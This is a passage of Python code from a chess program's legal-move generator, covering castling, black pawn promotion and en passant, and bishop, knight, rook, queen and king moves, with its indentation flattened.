elif self.white_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] + 1 == self.white_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "W":
king_moves[move] = False
for move in move_list:
if king_moves[move] == True:
if move[5] == "N" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0], self.white_king_inf[0][1] + 1))
elif move[5] == "N" and move[6] == "E":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] + 1, self.white_king_inf[0][1] + 1))
elif move[5] == "E" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] + 1, self.white_king_inf[0][1]))
elif move[5] == "S" and move[6] == "E":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] + 1, self.white_king_inf[0][1] - 1))
elif move[5] == "S" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0], self.white_king_inf[0][1] - 1))
elif move[5] == "S" and move[6] == "W":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] - 1, self.white_king_inf[0][1] - 1))
elif move[5] == "W" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] - 1, self.white_king_inf[0][1]))
elif move[5] == "N" and move[6] == "W":
self.legal_moves.append(notation.get_notation("K", self.white_king_inf[0][0], self.white_king_inf[0][1], self.white_king_inf[0][0] - 1, self.white_king_inf[0][1] + 1))
if self.white_king_inf[0][2] == True and self.white_king_inf[0][3] == True:
move_list = ["O-O", "O-O-O"]
king_moves = {
"O-O" : True,
"O-O-O" : True,
}
for i in range(0, len(self.white_occupation_x)):
if self.white_king_inf[0][0] + 2 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O"] = False
elif self.white_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O"] = False
if self.white_king_inf[0][0] - 3 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.white_king_inf[0][0] - 2 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.white_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.white_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
for i in range(0, len(self.black_occupation_x)):
if self.white_king_inf[0][0] + 2 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O"] = False
elif self.white_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O"] = False
if self.white_king_inf[0][0] - 3 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.white_king_inf[0][0] - 2 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.white_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.white_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
for i in range(0, 2):
if self.white_rooks_inf[i][2] == False or self.white_rooks_inf[i][3] == False:
if i == 0:
king_moves["O-O-O"] = False
elif i == 1:
king_moves["O-O"] = False
for move in move_list:
if king_moves[move] == True:
self.legal_moves.append(move)
else:
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
pawn_S_1 = True
pawn_S_2 = True
pawn_SE_11 = False
pawn_SW_11 = False
en_p_SE_11 = False
en_p_SW_11 = False
for j in range(0, len(self.black_occupation_x)):
if self.black_pawns_inf[i][0] == self.black_occupation_x[j] and self.black_pawns_inf[i][1] - 1 == self.black_occupation_y[j]:
pawn_S_1 = False
if self.black_pawns_inf[i][3] == True and self.black_pawns_inf[i][0] == self.black_occupation_x[j] and self.black_pawns_inf[i][1] - 2 == self.black_occupation_y[j]:
pawn_S_2 = False
for j in range(0, len(self.white_occupation_x)):
if self.black_pawns_inf[i][0] == self.white_occupation_x[j] and self.black_pawns_inf[i][1] - 1 == self.white_occupation_y[j]:
pawn_S_1 = False
if self.black_pawns_inf[i][3] == True and self.black_pawns_inf[i][0] == self.white_occupation_x[j] and self.black_pawns_inf[i][1] - 2 == self.white_occupation_y[j]:
pawn_S_2 = False
if self.black_pawns_inf[i][0] + 1 == self.white_occupation_x[j] and self.black_pawns_inf[i][1] - 1 == self.white_occupation_y[j]:
pawn_SE_11 = True
if self.black_pawns_inf[i][0] - 1 == self.white_occupation_x[j] and self.black_pawns_inf[i][1] - 1 == self.white_occupation_y[j]:
pawn_SW_11 = True
if self.black_pawns_inf[i][0] + 1 == self.en_passant_x_y[0] and self.black_pawns_inf[i][1] == self.en_passant_x_y[1]:
pawn_SE_11 = True
elif self.black_pawns_inf[i][0] - 1 == self.en_passant_x_y[0] and self.black_pawns_inf[i][1] == self.en_passant_x_y[1]:
pawn_SW_11 = True
if pawn_S_1 == True:
legal_move_notation = notation.get_notation("P", self.black_pawns_inf[i][0], self.black_pawns_inf[i][1], self.black_pawns_inf[i][0], self.black_pawns_inf[i][1] - 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_S_2 == True and pawn_S_1 == True and self.black_pawns_inf[i][3] == True:
legal_move_notation = notation.get_notation("P", self.black_pawns_inf[i][0], self.black_pawns_inf[i][1], self.black_pawns_inf[i][0], self.black_pawns_inf[i][1] - 2)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_SE_11 == True:
legal_move_notation = notation.get_notation("P", self.black_pawns_inf[i][0], self.black_pawns_inf[i][1], self.black_pawns_inf[i][0] + 1, self.black_pawns_inf[i][1] - 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
if pawn_SW_11 == True:
legal_move_notation = notation.get_notation("P", self.black_pawns_inf[i][0], self.black_pawns_inf[i][1], self.black_pawns_inf[i][0] - 1, self.black_pawns_inf[i][1] - 1)
if legal_move_notation[-1] == "=":
self.legal_moves.append(legal_move_notation + "Q")
self.legal_moves.append(legal_move_notation + "R")
self.legal_moves.append(legal_move_notation + "B")
self.legal_moves.append(legal_move_notation + "N")
else:
self.legal_moves.append(legal_move_notation)
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
move_list = ["bishop_NE_1", "bishop_NE_2", "bishop_NE_3", "bishop_NE_4", "bishop_NE_5", "bishop_NE_6", "bishop_NE_7", "bishop_SE_1", "bishop_SE_2", "bishop_SE_3", "bishop_SE_4", "bishop_SE_5", "bishop_SE_6", "bishop_SE_7", "bishop_SW_1", "bishop_SW_2", "bishop_SW_3", "bishop_SW_4", "bishop_SW_5", "bishop_SW_6", "bishop_SW_7", "bishop_NW_1", "bishop_NW_2", "bishop_NW_3", "bishop_NW_4", "bishop_NW_5", "bishop_NW_6", "bishop_NW_7"]
bishop_moves = {
"bishop_NE_1" : True,
"bishop_NE_2" : True,
"bishop_NE_3" : True,
"bishop_NE_4" : True,
"bishop_NE_5" : True,
"bishop_NE_6" : True,
"bishop_NE_7" : True,
"bishop_SE_1" : True,
"bishop_SE_2" : True,
"bishop_SE_3" : True,
"bishop_SE_4" : True,
"bishop_SE_5" : True,
"bishop_SE_6" : True,
"bishop_SE_7" : True,
"bishop_SW_1" : True,
"bishop_SW_2" : True,
"bishop_SW_3" : True,
"bishop_SW_4" : True,
"bishop_SW_5" : True,
"bishop_SW_6" : True,
"bishop_SW_7" : True,
"bishop_NW_1" : True,
"bishop_NW_2" : True,
"bishop_NW_3" : True,
"bishop_NW_4" : True,
"bishop_NW_5" : True,
"bishop_NW_6" : True,
"bishop_NW_7" : True,
}
for j in range(1, 8):
if self.black_bishops_inf[i][0] - j < 0:
for move in move_list:
if move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
if self.black_bishops_inf[i][1] - j < 0:
for move in move_list:
if move[7] == "S" and int(move[10]) >= j:
bishop_moves[move] = False
if self.black_bishops_inf[i][0] + j > 7:
for move in move_list:
if move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
if self.black_bishops_inf[i][1] + j > 7:
for move in move_list:
if move[7] == "N" and int(move[10]) >= j:
bishop_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.black_bishops_inf[i][0] + j == self.black_occupation_x[k] and self.black_bishops_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] + j == self.black_occupation_x[k] and self.black_bishops_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "E" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] - j == self.black_occupation_x[k] and self.black_bishops_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] - j == self.black_occupation_x[k] and self.black_bishops_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "W" and int(move[10]) >= j:
bishop_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.black_bishops_inf[i][0] + j == self.white_occupation_x[k] and self.black_bishops_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "E" and int(move[10]) > j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] + j == self.white_occupation_x[k] and self.black_bishops_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "E" and int(move[10]) > j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] - j == self.white_occupation_x[k] and self.black_bishops_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "S" and move[8] == "W" and int(move[10]) > j:
bishop_moves[move] = False
elif self.black_bishops_inf[i][0] - j == self.white_occupation_x[k] and self.black_bishops_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[7] == "N" and move[8] == "W" and int(move[10]) > j:
bishop_moves[move] = False
for move in move_list:
if bishop_moves[move] == True:
if move[7] == "N" and move[8] == "E":
self.legal_moves.append(notation.get_notation("B", self.black_bishops_inf[i][0], self.black_bishops_inf[i][1], self.black_bishops_inf[i][0] + int(move[10]), self.black_bishops_inf[i][1] + int(move[10])))
elif move[7] == "S" and move[8] == "E":
self.legal_moves.append(notation.get_notation("B", self.black_bishops_inf[i][0], self.black_bishops_inf[i][1], self.black_bishops_inf[i][0] + int(move[10]), self.black_bishops_inf[i][1] - int(move[10])))
elif move[7] == "S" and move[8] == "W":
self.legal_moves.append(notation.get_notation("B", self.black_bishops_inf[i][0], self.black_bishops_inf[i][1], self.black_bishops_inf[i][0] - int(move[10]), self.black_bishops_inf[i][1] - int(move[10])))
elif move[7] == "N" and move[8] == "W":
self.legal_moves.append(notation.get_notation("B", self.black_bishops_inf[i][0], self.black_bishops_inf[i][1], self.black_bishops_inf[i][0] - int(move[10]), self.black_bishops_inf[i][1] + int(move[10])))
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
knight_NE_21 = True
knight_NE_12 = True
knight_SE_12 = True
knight_SE_21 = True
knight_SW_21 = True
knight_SW_12 = True
knight_NW_12 = True
knight_NW_21 = True
if self.black_knights_inf[i][0] - 1 < 0:
knight_SW_21 = False
knight_SW_12 = False
knight_NW_12 = False
knight_NW_21 = False
elif self.black_knights_inf[i][0] - 2 < 0:
knight_SW_12 = False
knight_NW_12 = False
if self.black_knights_inf[i][0] + 1 > 7:
knight_NE_21 = False
knight_NE_12 = False
knight_SE_12 = False
knight_SE_21 = False
elif self.black_knights_inf[i][0] + 2 > 7:
knight_NE_12 = False
knight_SE_12 = False
if self.black_knights_inf[i][1] - 1 < 0:
knight_SE_12 = False
knight_SE_21 = False
knight_SW_21 = False
knight_SW_12 = False
elif self.black_knights_inf[i][1] - 2 < 0:
knight_SE_21 = False
knight_SW_21 = False
if self.black_knights_inf[i][1] + 1 > 7:
knight_NE_21 = False
knight_NE_12 = False
knight_NW_12 = False
knight_NW_21 = False
elif self.black_knights_inf[i][1] + 2 > 7:
knight_NE_21 = False
knight_NW_21 = False
for j in range(0, len(self.black_occupation_x)):
if self.black_knights_inf[i][0] + 1 == self.black_occupation_x[j] and self.black_knights_inf[i][1] + 2 == self.black_occupation_y[j]:
knight_NE_21 = False
if self.black_knights_inf[i][0] + 2 == self.black_occupation_x[j] and self.black_knights_inf[i][1] + 1 == self.black_occupation_y[j]:
knight_NE_12 = False
if self.black_knights_inf[i][0] + 2 == self.black_occupation_x[j] and self.black_knights_inf[i][1] - 1 == self.black_occupation_y[j]:
knight_SE_12 = False
if self.black_knights_inf[i][0] + 1 == self.black_occupation_x[j] and self.black_knights_inf[i][1] - 2 == self.black_occupation_y[j]:
knight_SE_21 = False
if self.black_knights_inf[i][0] - 1 == self.black_occupation_x[j] and self.black_knights_inf[i][1] - 2 == self.black_occupation_y[j]:
knight_SW_21 = False
if self.black_knights_inf[i][0] - 2 == self.black_occupation_x[j] and self.black_knights_inf[i][1] - 1 == self.black_occupation_y[j]:
knight_SW_12 = False
if self.black_knights_inf[i][0] - 2 == self.black_occupation_x[j] and self.black_knights_inf[i][1] + 1 == self.black_occupation_y[j]:
knight_NW_12 = False
if self.black_knights_inf[i][0] - 1 == self.black_occupation_x[j] and self.black_knights_inf[i][1] + 2 == self.black_occupation_y[j]:
knight_NW_21 = False
if knight_NE_21 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] + 1, self.black_knights_inf[i][1] + 2))
if knight_NE_12 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] + 2, self.black_knights_inf[i][1] + 1))
if knight_SE_12 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] + 2, self.black_knights_inf[i][1] - 1))
if knight_SE_21 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] + 1, self.black_knights_inf[i][1] - 2))
if knight_SW_21 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] - 1, self.black_knights_inf[i][1] - 2))
if knight_SW_12 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] - 2, self.black_knights_inf[i][1] - 1))
if knight_NW_12 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] - 2, self.black_knights_inf[i][1] + 1))
if knight_NW_21 == True:
self.legal_moves.append(notation.get_notation("N", self.black_knights_inf[i][0], self.black_knights_inf[i][1], self.black_knights_inf[i][0] - 1, self.black_knights_inf[i][1] + 2))
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
move_list = ["rook_N_1", "rook_N_2", "rook_N_3", "rook_N_4", "rook_N_5", "rook_N_6", "rook_N_7", "rook_E_1", "rook_E_2", "rook_E_3", "rook_E_4", "rook_E_5", "rook_E_6", "rook_E_7", "rook_S_1", "rook_S_2", "rook_S_3", "rook_S_4", "rook_S_5", "rook_S_6", "rook_S_7", "rook_W_1", "rook_W_2", "rook_W_3", "rook_W_4", "rook_W_5", "rook_W_6", "rook_W_7"]
rook_moves = {
"rook_N_1" : True,
"rook_N_2" : True,
"rook_N_3" : True,
"rook_N_4" : True,
"rook_N_5" : True,
"rook_N_6" : True,
"rook_N_7" : True,
"rook_E_1" : True,
"rook_E_2" : True,
"rook_E_3" : True,
"rook_E_4" : True,
"rook_E_5" : True,
"rook_E_6" : True,
"rook_E_7" : True,
"rook_S_1" : True,
"rook_S_2" : True,
"rook_S_3" : True,
"rook_S_4" : True,
"rook_S_5" : True,
"rook_S_6" : True,
"rook_S_7" : True,
"rook_W_1" : True,
"rook_W_2" : True,
"rook_W_3" : True,
"rook_W_4" : True,
"rook_W_5" : True,
"rook_W_6" : True,
"rook_W_7" : True,
}
for j in range(1, 8):
if self.black_rooks_inf[i][0] - j < 0:
for move in move_list:
if move[5] == "W" and int(move[7]) >= j:
rook_moves[move] = False
if self.black_rooks_inf[i][1] - j < 0:
for move in move_list:
if move[5] == "S" and int(move[7]) >= j:
rook_moves[move] = False
if self.black_rooks_inf[i][0] + j > 7:
for move in move_list:
if move[5] == "E" and int(move[7]) >= j:
rook_moves[move] = False
if self.black_rooks_inf[i][1] + j > 7:
for move in move_list:
if move[5] == "N" and int(move[7]) >= j:
rook_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.black_rooks_inf[i][0] == self.black_occupation_x[k] and self.black_rooks_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "N" and int(move[7]) >= j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] + j == self.black_occupation_x[k] and self.black_rooks_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "E" and int(move[7]) >= j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] == self.black_occupation_x[k] and self.black_rooks_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "S" and int(move[7]) >= j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] - j == self.black_occupation_x[k] and self.black_rooks_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[5] == "W" and int(move[7]) >= j:
rook_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.black_rooks_inf[i][0] == self.white_occupation_x[k] and self.black_rooks_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "N" and int(move[7]) > j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] + j == self.white_occupation_x[k] and self.black_rooks_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "E" and int(move[7]) > j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] == self.white_occupation_x[k] and self.black_rooks_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "S" and int(move[7]) > j:
rook_moves[move] = False
elif self.black_rooks_inf[i][0] - j == self.white_occupation_x[k] and self.black_rooks_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[5] == "W" and int(move[7]) > j:
rook_moves[move] = False
for move in move_list:
if rook_moves[move] == True:
if move[5] == "N":
self.legal_moves.append(notation.get_notation("R", self.black_rooks_inf[i][0], self.black_rooks_inf[i][1], self.black_rooks_inf[i][0], self.black_rooks_inf[i][1] + int(move[7])))
elif move[5] == "E":
self.legal_moves.append(notation.get_notation("R", self.black_rooks_inf[i][0], self.black_rooks_inf[i][1], self.black_rooks_inf[i][0] + int(move[7]), self.black_rooks_inf[i][1]))
elif move[5] == "S":
self.legal_moves.append(notation.get_notation("R", self.black_rooks_inf[i][0], self.black_rooks_inf[i][1], self.black_rooks_inf[i][0], self.black_rooks_inf[i][1] - int(move[7])))
elif move[5] == "W":
self.legal_moves.append(notation.get_notation("R", self.black_rooks_inf[i][0], self.black_rooks_inf[i][1], self.black_rooks_inf[i][0] - int(move[7]), self.black_rooks_inf[i][1]))
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
move_list = ["queen_N_1", "queen_N_2", "queen_N_3", "queen_N_4", "queen_N_5", "queen_N_6", "queen_N_7", "queen_NE_1", "queen_NE_2", "queen_NE_3", "queen_NE_4", "queen_NE_5", "queen_NE_6", "queen_NE_7", "queen_E_1", "queen_E_2", "queen_E_3", "queen_E_4", "queen_E_5", "queen_E_6", "queen_E_7", "queen_SE_1", "queen_SE_2", "queen_SE_3", "queen_SE_4", "queen_SE_5", "queen_SE_6", "queen_SE_7", "queen_S_1", "queen_S_2", "queen_S_3", "queen_S_4", "queen_S_5", "queen_S_6", "queen_S_7", "queen_SW_1", "queen_SW_2", "queen_SW_3", "queen_SW_4", "queen_SW_5", "queen_SW_6", "queen_SW_7", "queen_W_1", "queen_W_2", "queen_W_3", "queen_W_4", "queen_W_5", "queen_W_6", "queen_W_7", "queen_NW_1", "queen_NW_2", "queen_NW_3", "queen_NW_4", "queen_NW_5", "queen_NW_6", "queen_NW_7"]
queen_moves = {
"queen_N_1" : True,
"queen_N_2" : True,
"queen_N_3" : True,
"queen_N_4" : True,
"queen_N_5" : True,
"queen_N_6" : True,
"queen_N_7" : True,
"queen_NE_1" : True,
"queen_NE_2" : True,
"queen_NE_3" : True,
"queen_NE_4" : True,
"queen_NE_5" : True,
"queen_NE_6" : True,
"queen_NE_7" : True,
"queen_E_1" : True,
"queen_E_2" : True,
"queen_E_3" : True,
"queen_E_4" : True,
"queen_E_5" : True,
"queen_E_6" : True,
"queen_E_7" : True,
"queen_SE_1" : True,
"queen_SE_2" : True,
"queen_SE_3" : True,
"queen_SE_4" : True,
"queen_SE_5" : True,
"queen_SE_6" : True,
"queen_SE_7" : True,
"queen_S_1" : True,
"queen_S_2" : True,
"queen_S_3" : True,
"queen_S_4" : True,
"queen_S_5" : True,
"queen_S_6" : True,
"queen_S_7" : True,
"queen_SW_1" : True,
"queen_SW_2" : True,
"queen_SW_3" : True,
"queen_SW_4" : True,
"queen_SW_5" : True,
"queen_SW_6" : True,
"queen_SW_7" : True,
"queen_W_1" : True,
"queen_W_2" : True,
"queen_W_3" : True,
"queen_W_4" : True,
"queen_W_5" : True,
"queen_W_6" : True,
"queen_W_7" : True,
"queen_NW_1" : True,
"queen_NW_2" : True,
"queen_NW_3" : True,
"queen_NW_4" : True,
"queen_NW_5" : True,
"queen_NW_6" : True,
"queen_NW_7" : True,
}
for j in range(1, 8):
if self.black_queens_inf[i][0] - j < 0:
for move in move_list:
if move[6] == "W" or move[7] == "W":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.black_queens_inf[i][1] - j < 0:
for move in move_list:
if move[6] == "S":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.black_queens_inf[i][0] + j > 7:
for move in move_list:
if move[6] == "E" or move[7] == "E":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
if self.black_queens_inf[i][1] + j > 7:
for move in move_list:
if move[6] == "N":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.black_queens_inf[i][0] == self.black_occupation_x[k] and self.black_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.black_occupation_x[k] and self.black_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "E" and int(move[9]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.black_occupation_x[k] and self.black_queens_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "E" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.black_occupation_x[k] and self.black_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "E" and int(move[9]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] == self.black_occupation_x[k] and self.black_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.black_occupation_x[k] and self.black_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "W" and int(move[9]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.black_occupation_x[k] and self.black_queens_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "W" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.black_occupation_x[k] and self.black_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "W" and int(move[9]) >= j:
queen_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.black_queens_inf[i][0] == self.white_occupation_x[k] and self.black_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.white_occupation_x[k] and self.black_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "E" and int(move[9]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.white_occupation_x[k] and self.black_queens_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "E" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.white_occupation_x[k] and self.black_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "E" and int(move[9]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] == self.white_occupation_x[k] and self.black_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.white_occupation_x[k] and self.black_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "W" and int(move[9]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.white_occupation_x[k] and self.black_queens_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "W" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.white_occupation_x[k] and self.black_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "W" and int(move[9]) > j:
queen_moves[move] = False
for move in move_list:
if queen_moves[move] == True:
if move[6] == "N" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0], self.black_queens_inf[i][1] + int(move[8])))
elif move[6] == "N" and move[7] == "E":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] + int(move[9]), self.black_queens_inf[i][1] + int(move[9])))
elif move[6] == "E" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] + int(move[8]), self.black_queens_inf[i][1]))
elif move[6] == "S" and move[7] == "E":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] + int(move[9]), self.black_queens_inf[i][1] - int(move[9])))
elif move[6] == "S" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0], self.black_queens_inf[i][1] - int(move[8])))
elif move[6] == "S" and move[7] == "W":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] - int(move[9]), self.black_queens_inf[i][1] - int(move[9])))
elif move[6] == "W" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] - int(move[8]), self.black_queens_inf[i][1]))
elif move[6] == "N" and move[7] == "W":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] - int(move[9]), self.black_queens_inf[i][1] + int(move[9])))
if self.black_king_inf[0][2] == True:
move_list = ["king_N_1", "king_NE_1", "king_E_1", "king_SE_1", "king_S_1", "king_SW_1", "king_W_1", "king_NW_1"]
king_moves = {
"king_N_1" : True,
"king_NE_1" : True,
"king_E_1" : True,
"king_SE_1" : True,
"king_S_1" : True,
"king_SW_1" : True,
"king_W_1" : True,
"king_NW_1" : True,
}
if self.black_king_inf[0][0] - 1 < 0:
for move in move_list:
if move[5] == "W" or move[6] == "W":
king_moves[move] = False
if self.black_king_inf[0][1] - 1 < 0:
for move in move_list:
if move[5] == "S":
king_moves[move] = False
